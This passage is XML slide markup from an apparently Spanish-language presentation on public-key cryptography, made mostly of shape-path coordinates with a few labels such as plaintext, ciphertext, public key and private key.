                  <a:pt x="4130450" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="351298" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="283628" y="267"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="229982" y="2142"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="185289" y="7231"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="144477" y="17140"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="102642" y="37801"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="66692" y="66692"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="37801" y="102642"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="17140" y="144477"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7228" y="185289"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2142" y="229787"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="267" y="282970"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="349738"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6" y="2496730"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="267" y="2562844"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2142" y="2616487"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7237" y="2661203"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="17140" y="2701991"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="37801" y="2743825"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="66692" y="2779775"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="102642" y="2808666"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="144477" y="2829327"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="185264" y="2839237"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="229787" y="2844325"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="282970" y="2846200"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="349738" y="2846468"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4128900" y="2846468"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4196565" y="2846200"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4250210" y="2844325"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4294903" y="2839237"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4335710" y="2829327"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4377547" y="2808666"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4413500" y="2779775"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4442395" y="2743825"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4463057" y="2701991"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4472964" y="2661179"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4478046" y="2616680"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4479920" y="2563498"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4480188" y="2496730"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4480182" y="349738"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4479920" y="283628"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4478046" y="229982"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4472955" y="185264"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4463057" y="144477"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4442395" y="102642"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4413500" y="66692"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4377547" y="37801"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4335710" y="17140"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4294927" y="7231"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4250404" y="2142"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4197219" y="267"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="41304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8"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="7219502" y="3811364"/>
            <a:ext cx="1332967" cy="846894"/>
          </a:xfrm>
          <a:custGeom>
            <a:rect b="b" l="l" r="r" t="t"/>
            <a:pathLst>
              <a:path extrusionOk="0" h="2846704" w="4480560">
                <a:moveTo>
                  <a:pt x="349738" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="4130450" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4197217" y="267"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4250400" y="2142"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4294923" y="7230"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4335710" y="17138"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4377545" y="37800"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4413496" y="66693"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4442391" y="102643"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4463057" y="144477"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4472961" y="185289"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4478046" y="229982"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4479920" y="283628"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4480188" y="351298"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4480188" y="2496730"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4479920" y="2563498"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4478046" y="2616680"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4472961" y="2661203"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4463057" y="2701991"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4442391" y="2743825"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4413496" y="2779776"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4377545" y="2808671"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4335710" y="2829337"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4294899" y="2839241"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4250206" y="2844327"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4196564" y="2846200"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4128900" y="2846468"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="349738" y="2846468"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="282970" y="2846200"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="229787" y="2844327"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="185264" y="2839241"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="144477" y="2829337"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="102643" y="2808671"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="66693" y="2779776"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="37800" y="2743825"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="17138" y="2701991"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7230" y="2661179"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2142" y="2616487"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="267" y="2562844"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="2495180"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="349738"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="267" y="282970"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2142" y="229787"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7230" y="185264"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="17138" y="144477"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="37800" y="102643"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="66693" y="66693"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="102643" y="37800"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="144477" y="17138"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="185289" y="7230"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="229982" y="2142"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="283628" y="267"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="351298" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="349738" y="0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8"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="7098008" y="4665538"/>
            <a:ext cx="1577797" cy="82933"/>
          </a:xfrm>
          <a:custGeom>
            <a:rect b="b" l="l" r="r" t="t"/>
            <a:pathLst>
              <a:path extrusionOk="0" h="278765" w="5303520">
                <a:moveTo>
                  <a:pt x="5163947" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="139377" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="95325" y="7106"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="57065" y="26893"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="26893" y="57065"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7106" y="95325"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="139377"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7106" y="183430"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="26893" y="221690"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="57065" y="251862"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="95325" y="271649"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="139377" y="278755"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5163947" y="278755"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5208003" y="271649"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5246264" y="251862"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5276435" y="221690"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5296220" y="183430"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5303325" y="139377"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5296220" y="95325"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5276435" y="57065"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5246264" y="26893"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5208003" y="7106"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5163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8"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="7098008" y="4665538"/>
            <a:ext cx="1577797" cy="82933"/>
          </a:xfrm>
          <a:custGeom>
            <a:rect b="b" l="l" r="r" t="t"/>
            <a:pathLst>
              <a:path extrusionOk="0" h="278765" w="5303520">
                <a:moveTo>
                  <a:pt x="139377" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="5163947" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5207999" y="7105"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5246260" y="26891"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5276432" y="57062"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5296219" y="95323"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5303325" y="139377"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5296219" y="183430"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5276432" y="221690"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5246260" y="251862"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5207999" y="271649"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5163947" y="278755"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="139377" y="278755"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="95323" y="271649"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="57062" y="251862"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="26891" y="221690"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7105" y="183430"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="139377"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7105" y="95323"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="26891" y="57062"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="57062" y="26891"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="95323" y="7105"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="139377" y="0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8"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="7288431" y="3881286"/>
            <a:ext cx="1194116" cy="708044"/>
          </a:xfrm>
          <a:custGeom>
            <a:rect b="b" l="l" r="r" t="t"/>
            <a:pathLst>
              <a:path extrusionOk="0" h="2379979" w="4013835">
                <a:moveTo>
                  <a:pt x="3700232" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="314712" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="254091" y="240"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="206031" y="1920"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="165992" y="6480"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="129430" y="15360"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="91954" y="33865"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="59748" y="59748"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="33865" y="91954"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="15360" y="129430"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1920" y="205857"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="240" y="253503"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="313320"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5" y="2066512"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="240" y="2125735"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1920" y="2173792"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6485" y="2213852"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="33865" y="2287868"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="59748" y="2320075"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="91954" y="2345961"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="129430" y="2364472"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="205857" y="2377904"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="253503" y="2379582"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="313320" y="2379822"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3698840" y="2379822"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3759461" y="2379582"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3807520" y="2377904"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3847556" y="2373346"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3921593" y="2345961"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3953799" y="2320075"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3979682" y="2287868"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3998192" y="2250392"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4011623" y="2173966"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4013302" y="2126323"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4013542" y="2066512"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4013537" y="313320"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4013302" y="254091"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4011623" y="206031"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4007061" y="165970"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3979682" y="91954"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3953799" y="59748"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3921593" y="33865"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3884112" y="15360"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3807694" y="1920"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3760049" y="240"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="370023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8"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="7288431" y="3881286"/>
            <a:ext cx="1194116" cy="708044"/>
          </a:xfrm>
          <a:custGeom>
            <a:rect b="b" l="l" r="r" t="t"/>
            <a:pathLst>
              <a:path extrusionOk="0" h="2379979" w="4013835">
                <a:moveTo>
                  <a:pt x="313309" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="3700232" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3760043" y="239"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3807686" y="1919"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3847572" y="6477"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3921588" y="33863"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3953795" y="59746"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3979681" y="91952"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3998192" y="129430"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4011623" y="206030"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4013302" y="254086"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4013542" y="314702"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4013542" y="2066512"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4013302" y="2126323"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4011623" y="2173966"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4007066" y="2213852"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3979681" y="2287868"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3953795" y="2320075"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3921588" y="2345961"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3884112" y="2364472"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3807512" y="2377904"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3759455" y="2379582"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3698840" y="2379822"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="313309" y="2379822"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="253499" y="2379582"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="205856" y="2377904"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="165970" y="2373346"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="91952" y="2345961"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="59746" y="2320075"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="33863" y="2287868"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="15353" y="2250392"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1919" y="2173792"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="239" y="2125735"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="2065120"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="313309"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="239" y="253499"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1919" y="205856"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6477" y="165970"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="33863" y="91952"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="59746" y="59746"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="91952" y="33863"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="129430" y="15353"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="206030" y="1919"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="254086" y="239"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="314702" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="313309" y="0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" name="Google Shape;234;p18"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="10800000">
            <a:off x="3170919" y="4234813"/>
            <a:ext cx="864300" cy="0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5" name="Google Shape;235;p18"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="4294967295" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="4043400" y="3719550"/>
            <a:ext cx="30237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400">
                <a:solidFill>
                  <a:schemeClr val="dk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s" sz="2400">
                <a:solidFill>
                  <a:srgbClr val="0000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Texto Cifrado</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es" sz="2400">
                <a:solidFill>
                  <a:schemeClr val="dk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400">
                <a:solidFill>
                  <a:schemeClr val="dk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s" sz="2400">
                <a:solidFill>
                  <a:srgbClr val="0000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Llave    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es" sz="2400">
                <a:solidFill>
                  <a:schemeClr val="dk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6" name="Google Shape;236;p18"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="4294967295" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="620594" y="4037400"/>
            <a:ext cx="26073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400">
                <a:solidFill>
                  <a:schemeClr val="dk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s" sz="2400">
                <a:solidFill>
                  <a:srgbClr val="0000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Texto Plano</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es" sz="2400">
                <a:solidFill>
                  <a:schemeClr val="dk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/>
          <p:nvPr>
            <p:ph type="ctrTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="311708" y="10587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Criptografía de Llave Pública</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="242" name="Google Shape;242;p19"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="311700" y="3292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[Public-Key Cryptography]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Seguridad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/>
          <p:nvPr>
            <p:ph idx="4294967295" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1576950" y="2182500"/>
            <a:ext cx="59901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4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s" sz="2400">
                <a:solidFill>
                  <a:srgbClr val="0000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Llave Pública</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es" sz="24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s" sz="2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 sz="24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s" sz="2400">
                <a:solidFill>
                  <a:srgbClr val="0000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Llave Privada</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es" sz="2400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/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="591532" y="306164"/>
            <a:ext cx="1332967" cy="846894"/>
          </a:xfrm>
          <a:custGeom>
            <a:rect b="b" l="l" r="r" t="t"/>
            <a:pathLst>
              <a:path extrusionOk="0" h="2846704" w="4480560">
                <a:moveTo>
                  <a:pt x="4130450" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="351298" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="283628" y="267"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="229982" y="2142"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="185289" y="7231"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="144477" y="17140"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="102642" y="37801"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="66692" y="66692"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="37801" y="102642"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="17140" y="144477"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7228" y="185289"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2142" y="229787"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="267" y="282970"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="349738"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6" y="2496730"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="267" y="2562844"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2142" y="2616487"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7237" y="2661203"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="17140" y="2701991"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="37801" y="2743825"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="66692" y="2779775"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="102642" y="2808666"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="144477" y="2829327"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="185264" y="2839237"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="229787" y="2844325"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="282970" y="2846200"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="349738" y="2846468"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4128900" y="2846468"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4196565" y="2846200"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4250210" y="2844325"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4294903" y="2839237"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4335710" y="2829327"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4377547" y="2808666"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4413500" y="2779775"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4442395" y="2743825"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4463057" y="2701991"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4472964" y="2661179"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4478046" y="2616680"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4479920" y="2563498"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4480188" y="2496730"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4480182" y="349738"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4479920" y="283628"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4478046" y="229982"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4472955" y="185264"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4463057" y="144477"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4442395" y="102642"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4413500" y="66692"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4377547" y="37801"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4335710" y="17140"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4294927" y="7231"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4250404" y="2142"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4197219" y="267"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="41304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1"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="591532" y="306164"/>
            <a:ext cx="1332967" cy="846894"/>
          </a:xfrm>
          <a:custGeom>
            <a:rect b="b" l="l" r="r" t="t"/>
            <a:pathLst>
              <a:path extrusionOk="0" h="2846704" w="4480560">
                <a:moveTo>
                  <a:pt x="349738" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="4130450" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4197217" y="267"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4250400" y="2142"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4294923" y="7230"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4335710" y="17138"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4377545" y="37800"/>
